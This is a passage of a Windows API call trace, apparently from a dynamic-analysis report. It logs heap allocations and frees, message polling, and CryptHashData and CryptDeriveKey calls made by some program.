Size=0x3) returned 0x2e54fd8 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0248.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0248.907] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0248.907] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0248.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0248.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0248.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0248.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0248.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0248.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51898 [0248.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51898, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0248.909] CryptHashData (hHash=0xa87390, pbData=0x2e54f18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0248.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0248.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0248.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.910] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0248.910] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0248.910] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0248.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0248.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0248.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e518f8 [0248.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e518f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0248.911] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87390, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa876d0) returned 1 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0248.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0248.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0248.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0248.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0248.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0248.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0248.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0248.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0248.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0248.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0248.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0248.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0248.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0248.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0248.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0248.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0248.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0248.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0248.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0248.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0248.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.915] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0248.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0248.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0248.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0248.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0248.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517d8 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51850 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0248.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 